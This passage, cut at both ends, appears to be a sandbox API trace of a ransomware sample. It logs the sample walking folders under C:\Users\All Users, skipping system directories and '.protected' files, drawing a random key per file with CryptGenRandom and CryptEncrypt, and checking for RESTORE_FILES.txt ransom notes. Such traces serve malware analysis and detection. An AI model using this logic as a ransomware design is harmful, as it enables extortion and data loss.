[0093.149] lstrcmpiW (lpString1="tasks.xml", lpString2="Program Files") returned 1 [0093.150] lstrcmpiW (lpString1="tasks.xml", lpString2="Program Files (x86)") returned 1 [0093.150] lstrcmpiW (lpString1="tasks.xml", lpString2="$Recycle.bin") returned 1 [0093.150] lstrcmpiW (lpString1="tasks.xml", lpString2="System Volume Information") returned 1 [0093.150] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml") returned 99 [0093.150] StrStrIW (lpFirst="tasks.xml", lpSrch=".protected") returned 0x0 [0093.150] lstrcmpW (lpString1="tasks.xml", lpString2="RESTORE_FILES.txt") returned 1 [0093.150] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.150] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.150] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.150] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.150] lstrcmpiW (lpString1="wmp.ico", lpString2="Windows") returned 1 [0093.150] lstrcmpiW (lpString1="wmp.ico", lpString2="Program Files") returned 1 [0093.150] lstrcmpiW (lpString1="wmp.ico", lpString2="Program Files (x86)") returned 1 [0093.150] lstrcmpiW (lpString1="wmp.ico", lpString2="$Recycle.bin") returned 1 [0093.150] lstrcmpiW (lpString1="wmp.ico", lpString2="System Volume Information") 
returned 1 [0093.150] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico") returned 97 [0093.150] StrStrIW (lpFirst="wmp.ico", lpSrch=".protected") returned 0x0 [0093.150] lstrcmpW (lpString1="wmp.ico", lpString2="RESTORE_FILES.txt") returned 1 [0093.150] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.150] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.150] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.151] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.151] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.151] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\RESTORE_FILES.txt") returned 107 [0093.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0xffffffff [0093.151] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.151] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="Windows") returned -1 [0093.151] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="Program Files") returned -1 [0093.151] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="Program Files (x86)") returned -1 [0093.151] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="$Recycle.bin") returned 1 [0093.151] lstrcmpiW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="System Volume Information") returned -1 [0093.151] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned 89 [0093.151] lstrcmpW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2=".") returned 1 [0093.151] lstrcmpW (lpString1="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="..") returned 1 [0093.151] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*") returned 91 [0093.151] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.151] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.151] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.151] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.151] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.151] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.151] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\.") returned 91 [0093.151] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.151] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.152] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.152] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.152] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.152] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.152] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.152] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\..") returned 92 [0093.152] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.152] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.152] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.152] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0093.152] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0093.152] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0093.152] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0093.152] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0093.152] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned 95 [0093.152] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0093.152] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0093.152] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, 
pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*") returned 97 [0093.152] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.152] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.152] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.152] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.152] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.152] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.152] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\.") returned 97 [0093.152] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.152] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.152] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.152] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.152] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.152] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.152] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.152] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\..") returned 98 [0093.152] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.152] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.152] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: 
lpFindFileData=0x295e7d0) returned 1 [0093.152] lstrcmpiW (lpString1="resource.xml", lpString2="Windows") returned -1 [0093.152] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files") returned 1 [0093.152] lstrcmpiW (lpString1="resource.xml", lpString2="Program Files (x86)") returned 1 [0093.153] lstrcmpiW (lpString1="resource.xml", lpString2="$Recycle.bin") returned 1 [0093.153] lstrcmpiW (lpString1="resource.xml", lpString2="System Volume Information") returned -1 [0093.153] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml") returned 108 [0093.153] StrStrIW (lpFirst="resource.xml", lpSrch=".protected") returned 0x0 [0093.153] lstrcmpW (lpString1="resource.xml", lpString2="RESTORE_FILES.txt") returned -1 [0093.153] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.153] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.153] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.153] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.153] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.153] lstrcmpiW (lpString1="RESTORE_FILES.txt", 
lpString2="Program Files (x86)") returned 1 [0093.153] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.153] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.153] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\RESTORE_FILES.txt") returned 113 [0093.153] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.153] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.153] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.153] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.153] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\RESTORE_FILES.txt") returned 113 [0093.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.153] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.153] lstrcmpiW (lpString1="folder.ico", lpString2="Windows") returned -1 [0093.153] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files") returned -1 [0093.153] lstrcmpiW (lpString1="folder.ico", lpString2="Program Files (x86)") returned -1 [0093.153] lstrcmpiW (lpString1="folder.ico", lpString2="$Recycle.bin") returned 1 
[0093.153] lstrcmpiW (lpString1="folder.ico", lpString2="System Volume Information") returned -1 [0093.153] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico") returned 100 [0093.153] StrStrIW (lpFirst="folder.ico", lpSrch=".protected") returned 0x0 [0093.153] lstrcmpW (lpString1="folder.ico", lpString2="RESTORE_FILES.txt") returned -1 [0093.153] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.153] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.154] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.154] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.154] lstrcmpiW (lpString1="print_pref.ico", lpString2="Windows") returned -1 [0093.154] lstrcmpiW (lpString1="print_pref.ico", lpString2="Program Files") returned -1 [0093.154] lstrcmpiW (lpString1="print_pref.ico", lpString2="Program Files (x86)") returned -1 [0093.154] lstrcmpiW (lpString1="print_pref.ico", lpString2="$Recycle.bin") returned 1 [0093.154] lstrcmpiW (lpString1="print_pref.ico", lpString2="System Volume Information") returned -1 [0093.154] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device 
Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico") returned 104 [0093.154] StrStrIW (lpFirst="print_pref.ico", lpSrch=".protected") returned 0x0 [0093.154] lstrcmpW (lpString1="print_pref.ico", lpString2="RESTORE_FILES.txt") returned -1 [0093.154] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.154] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.154] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.154] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.154] lstrcmpiW (lpString1="print_property.ico", lpString2="Windows") returned -1 [0093.154] lstrcmpiW (lpString1="print_property.ico", lpString2="Program Files") returned -1 [0093.154] lstrcmpiW (lpString1="print_property.ico", lpString2="Program Files (x86)") returned -1 [0093.154] lstrcmpiW (lpString1="print_property.ico", lpString2="$Recycle.bin") returned 1 [0093.154] lstrcmpiW (lpString1="print_property.ico", lpString2="System Volume Information") returned -1 [0093.154] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico") returned 108 [0093.154] StrStrIW (lpFirst="print_property.ico", lpSrch=".protected") returned 0x0 [0093.154] lstrcmpW (lpString1="print_property.ico", 
lpString2="RESTORE_FILES.txt") returned -1 [0093.154] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.154] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.154] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.154] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.155] lstrcmpiW (lpString1="print_queue.ico", lpString2="Windows") returned -1 [0093.155] lstrcmpiW (lpString1="print_queue.ico", lpString2="Program Files") returned -1 [0093.155] lstrcmpiW (lpString1="print_queue.ico", lpString2="Program Files (x86)") returned -1 [0093.155] lstrcmpiW (lpString1="print_queue.ico", lpString2="$Recycle.bin") returned 1 [0093.155] lstrcmpiW (lpString1="print_queue.ico", lpString2="System Volume Information") returned -1 [0093.155] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico") returned 105 [0093.155] StrStrIW (lpFirst="print_queue.ico", lpSrch=".protected") returned 0x0 [0093.155] lstrcmpW (lpString1="print_queue.ico", lpString2="RESTORE_FILES.txt") returned -1 [0093.155] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.155] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.155] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.155] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.155] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.155] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.155] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.155] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.155] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.155] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\RESTORE_FILES.txt") returned 107 [0093.155] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.155] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.155] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.155] lstrcmpiW (lpString1="scan_.ico", lpString2="Windows") returned -1 [0093.155] lstrcmpiW (lpString1="scan_.ico", lpString2="Program Files") returned 1 [0093.155] lstrcmpiW (lpString1="scan_.ico", lpString2="Program Files (x86)") returned 1 [0093.155] lstrcmpiW (lpString1="scan_.ico", lpString2="$Recycle.bin") returned 1 
[0093.155] lstrcmpiW (lpString1="scan_.ico", lpString2="System Volume Information") returned -1 [0093.155] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico") returned 99 [0093.155] StrStrIW (lpFirst="scan_.ico", lpSrch=".protected") returned 0x0 [0093.155] lstrcmpW (lpString1="scan_.ico", lpString2="RESTORE_FILES.txt") returned 1 [0093.155] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.155] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.155] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.155] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.155] lstrcmpiW (lpString1="scan_property.ico", lpString2="Windows") returned -1 [0093.156] lstrcmpiW (lpString1="scan_property.ico", lpString2="Program Files") returned 1 [0093.156] lstrcmpiW (lpString1="scan_property.ico", lpString2="Program Files (x86)") returned 1 [0093.156] lstrcmpiW (lpString1="scan_property.ico", lpString2="$Recycle.bin") returned 1 [0093.156] lstrcmpiW (lpString1="scan_property.ico", lpString2="System Volume Information") returned -1 [0093.156] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device 
Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico") returned 107 [0093.156] StrStrIW (lpFirst="scan_property.ico", lpSrch=".protected") returned 0x0 [0093.156] lstrcmpW (lpString1="scan_property.ico", lpString2="RESTORE_FILES.txt") returned 1 [0093.156] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.156] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.156] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.156] lstrcmpiW (lpString1="scan_settings.ico", lpString2="Windows") returned -1 [0093.156] lstrcmpiW (lpString1="scan_settings.ico", lpString2="Program Files") returned 1 [0093.156] lstrcmpiW (lpString1="scan_settings.ico", lpString2="Program Files (x86)") returned 1 [0093.156] lstrcmpiW (lpString1="scan_settings.ico", lpString2="$Recycle.bin") returned 1 [0093.156] lstrcmpiW (lpString1="scan_settings.ico", lpString2="System Volume Information") returned -1 [0093.156] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico") returned 107 [0093.156] StrStrIW (lpFirst="scan_settings.ico", lpSrch=".protected") returned 0x0 [0093.156] lstrcmpW (lpString1="scan_settings.ico", 
